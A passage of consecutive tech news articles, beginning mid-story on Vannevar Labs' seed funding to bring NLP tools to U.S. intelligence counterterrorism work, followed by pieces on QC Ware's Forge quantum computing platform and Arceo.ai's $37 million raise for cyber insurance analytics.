Despite the desire for better tools though, intelligence analysts are often stymied to procure up-to-date software due to the byzantine rules that drive Pentagon and intelligence procurement.

That’s why a former intelligence official and former intelligence investor are looking to build a new platform that connects the best minds in artificial intelligence, machine learning, and natural language processing and bundling it together into a service purchasable by these government agencies.

Through Palo Alto-based Vannevar, co-founders Brett Granberg and Nini Moorhead are hoping to launch their first product, which is focused on bringing NLP technologies like feature detection to international counterterrorism missions.

Vannevar Labs

Co-founders Nimi Moorhead and Brett Granberg of Vannevar Labs. Photo via Vannevar Labs.

The company is named for Vannevar Bush, who is often credited with inventing an early form of the computer, putting together the Manhattan Project which led to the atom bomb, and for writing a seminal essay that sort of predicted the internet decades before its inception.

The two chose this particular product as an entrée because of their past experiences. Before beginning Vannevar, Granberg spent two years at In-Q-Tel, the non-profit VC firm that works deeply with the intelligence community to supply agencies with the best in startup technology. He also was an advisor at Lilt, a real-time deep learning translation product that spun out of Chris Manning’s famed Stanford NLP research lab.

Meanwhile, Moorhead spent seven years working as a counterterrorism officer within the intelligence community, working to disrupt terrorist networks.

The two met while they overlapped at Stanford GSB and realized they had seen similar problems that they both wanted to solve. While in business school, “top of mind for me was some of the technological challenges that I encountered as an end user [and] analyst in the intelligence community,” Moorhead said. “We immediately connected and shared a lot of experiences in common in terms of seeing gaps between the really hard domain problems that I’d been working on in my career as an analyst and some of the technology that was available to me,” she said. The two actually met the first day of school.

Their approach is to take proven techniques and attempt to translate them into government use cases. “We’re not sort of inventing new math to solve these problems, we’re more taking cutting-edge approaches and just applying them to specific use cases,” Granberg said.

While the project is early, the team raised a $4.5 million seed venture capital funding from fellow GSB alum Katherine Boyle of General Catalyst and Costanoa Ventures. Boyle has made a big push into defense and highly-regulated industries as part of her investment practice, where she previously funded Anduril, the company started by Oculus founder Palmer Luckey that has attempted to apply ML technology to security issues such as battlefield awareness and border control (and gotten into some controversy along the way as well).

She is particularly excited about new ways for startups to secure government contracts at a speed faster than the sun burning out. Talking to me about the potential in this industry, she said:

We’ve been spending a lot of time with companies that are going after what’s known as Other Transaction Authorities, which are a new type of contracting vehicle that was developed in 2015 by former Secretary of Defense Ash Carter, to help tech companies work very quickly with the Department of Defense and with the intelligence community. So what historically might have taken 18 months to get a contract now takes 30 to 60 days for critical pieces of technology

Boyle explained that Vannevar fits directly into her thesis for the future of government procurement. “Our view is that the companies that do best in the space are people who have worked in government or understand how to sell to governments,” she said. She noted that the company is very early, and her investment was primarily focused on the team.

I asked about recent controversies that have hit companies like Google, which saw a revolt by some employees over its involvement with a defense program called Project Maven, which attempted to use machine learning technology and apply that to the battlefield, so that, for instance, drones could increase their effectiveness during strikes.

Granberg said that “we think that the people that defend our country should have access to the best tools and technologies to do their job. We know these people, we used to work with them, and we want to help them.”

He understands the concerns of critics though, and says that Vannevar intends to work with the government to ensure ethics remains core to its product. “We believe it’s our responsibility to sort of shape that technology and help the government think about putting in place policies that … prevent the misuse from happening.”

Boyle agreed. “One of the things that we’ve noticed is that if you’re very transparent and upfront about the types of products you’re going to be building in the beginning, it’s not a recruitment problem, it’s not an ethics problem.” Unlike Google, which had a six-figure large workforce with many employees who don’t want to touch defense-related code, the hope for Granberg and Moorhead is that a company like Vannevar can build a coalition of the willing, as it were, and maybe solve some serious security problems as well.

QC Ware Forge will give developers access to quantum hardware and simulators across vendors

Quantum computing is almost ready for prime time, and, according to most experts, now is the time to start learning how to best develop for this new and less than intuitive technology. With multiple vendors like D-Wave, Google, IBM, Microsoft and Rigetti offering commercial and open-source hardware solutions, simulators and other tools, there’s already a lot of fragmentation in this business. QC Ware, which is launching its Forge cloud platform into beta today, wants to become the go-to middleman for accessing the quantum computing hardware and simulators of these vendors.

Forge, which like the rest of QC Ware’s efforts is aimed at enterprise users, will give developers the ability to run their algorithms on a variety of hardware platforms and simulators. The company argues that developers won’t need to have any previous expertise in quantum computing, though having a bit of background surely isn’t going to hurt. From Forge’s user interface, developers will be able to run algorithms for binary optimization, chemistry simulation and machine learning.

Screen Shot 2019 09 19 at 2.16.37 PM

“Practical quantum advantage will occur. Most experts agree that it’s a matter of ‘when’ not ‘if.’ The way to pull that horizon closer is by having the user community fully engaged in quantum computing application discovery. The objective of Forge is to allow those users to access the full range of quantum computing resources through a single platform,” said Matt Johnson, CEO, QC Ware. “To assist our customers in that exploration, we are spending all of our cycles working on ways to squeeze as much power as possible out of near-term quantum computers, and to bake those methods into Forge.”

Currently, QC Ware Forge offers access to hardware from D-Wave, as well as open-source simulators running on Google’s and IBM’s clouds, with plans to support a wider variety of platforms in the near future.

Initially, QC Ware also told me that it offered direct access to IBM’s hardware, but that’s not yet the case. “We currently have the integration complete and actively utilized by QC Ware developers and quantum experts,”  QC Ware’s head of business development Yianni Gamvros told me. “However, we are still working with IBM to put an agreement in place in order for our end-users to directly access IBM hardware. We expect that to be available in our next major release. For users, this makes it easier for them to deal with the churn. We expect different hardware vendors will lead at different times and that will keep changing every six months. And for our quantum computing hardware vendors, they have a channel partner they can sell through.”

Users who sign up for the beta will receive 30 days of access to the platform and one minute of actual Quantum Computing Time to evaluate the platform.

Arceo.ai raises $37 million to expand cyber insurance coverage and access

Critical cyber attacks on both businesses and individuals have been grabbing headlines at an alarming rate. Cybersecurity has moved from a background risk for enterprises to a critical day-to-day threat to business operations, forcing executive teams to pour time and hundreds of billions in capital into monitoring and prevention efforts.

Yet even as investment in security ticks up, the frequency and cost of cybercrime to businesses continues to rapidly accelerate, with the World Economic Forum estimating the economic loss due to cybercrime could reach $3 trillion by 2020.

More companies are now turning to cyber insurance as a means of mitigating financial exposure. However, for traditional insurers, cybersecurity remains a relatively nascent and unfamiliar issue, requiring risk-assessment data points and methodologies largely different from those seen in traditional insurance products. As a result, businesses often struggle to get the scale of cybersecurity coverage they require.

Arceo.ai is hoping to expand the size and scope of the cyber insurance market for both insurers and companies, by providing insurers with effective real-time data, analytics and context, necessary for safely and efficiently underwrite cyber risk.

This morning, Arceo took a major step in achieving that goal, announcing the company has raised a $37 million round of funding led by Lightspeed Venture Partners and Founders Fund with participation from CRV and  UL Ventures.

Arceo logoUsing an expansive set of global sources across a customer’s digital footprint, Arceo.AI collects internal, external and macro cyber risk data which it uses to evaluate a company’s security and cyber risk management behavior. By automating the data collection process and connecting it with insurer underwriting processes, Arceo is able to keep its data and policy assessments up to date in real-time and enable faster, more efficient quotes.

A vital component of Arceo’s platform is its analytics offering. Using patented data science and cyber risk models, Arceo generates analytics-driven insights for insurance carriers, brokers and end-insured customers. For end-insured customers, Arceo helps companies understand whether they’re using the best mitigation strategies by providing policy recommendations and industry benchmarking to help contextualize day-to-day cyber behavior and hygiene. For underwriters, Arceo can provide specific insurance recommendations based on particular policy coverages.

Ultimately, Arceo looks to provide both insurers and the insured with actionable answers to key questions such as how one assesses cyber risk, how one determines what risks can be mitigated with technology alone, how one knows which systems are best and whether those systems are being used appropriately.

Raj Shah

Arceo.ai Chairman Raj Shah. Image via Arceo.ai

In an interview with TechCrunch, Arceo Chairman Raj Shah explained that the company’s background expertise, proprietary data systems, and deep pedigree in both the security and insurance truly differentiate Arceo from competing solutions. For starters, both Shah and Arceo co-founder and CEO Vishaal Hariprasad have spent close to the entirety of their careers in national security and cybersecurity. Hariprasad started his career in the Airforce’s first cohort of cyber warfare officers, before teaming up with Shah to start Morta Security in 2012, a security startup the two sold to Palo Alto networks in just roughly two years.

After selling the company, Shah and Hariprasad remained in the security world before realizing that there was a natural intersection between security and insurance, and a real opportunity for risk transfer solutions.

“Having studied the market, we saw that people are spending more and more dollars on cybersecurity products… There are hundreds of thousands of new vendors every year… Spend is going up, but we don’t feel any safer!” Shah told TechCrunch.

“That’s when we said ‘Hey, we need to move beyond just thinking about technology points and products, and think about holistic cyber risk management.’ And this is where insurance has historically done a great job. Putting a price on behavior and making people think and letting them take risks… From life and death and health to buyers and property and casualty. And so cyber is that next class risk… So that’s really why we started the business. We wanted to provide a real way to manage the cyber stress that they’re facing and that will impact every single one of our digital lives.”

Since the company’s founding, Raj and Vishaal have been joined by a deep network of cyber and insurance experts. Today, Arceo also announced that Hemant Shah, founder and former CEO of catastrophe risk modeling company RMS has joined Arceo’s Board of Directors. Additionally, earlier this month, the company announced that Mario Vitale, the former CEO of publically-traded insurance companies Willis Towers Watson and Zurich Insurance Group, would be joining the Arceo team as the company’s President.

The company noted that participation from high-profile industry vets like Hemant and Mario not only further advance Arceo’s competitive advantage but also acts as another major validation of the company’s future and work to date.

According to Arceo Chairman Raj Shah, after years of investing in R&D, the latest funds will be used towards expansion efforts and scaling Arceo to the broader ecosystem of insurance and brokers. Longer-term, the company hopes to offer the most complete combined cybersecurity and risk transfer solution to insurers and the insured, easing the stress around cyber threats for both enterprises and individuals and ultimately improving broader cyber resiliency.

If you’d like to hear more from Arceo’s Raj Shah, Raj will also be joining us this year on the Extra Crunch stage at TechCrunch Disrupt SF, where he’ll discuss how founders and companies should think about potential US government investment. Grab tickets here and we hope to see you there!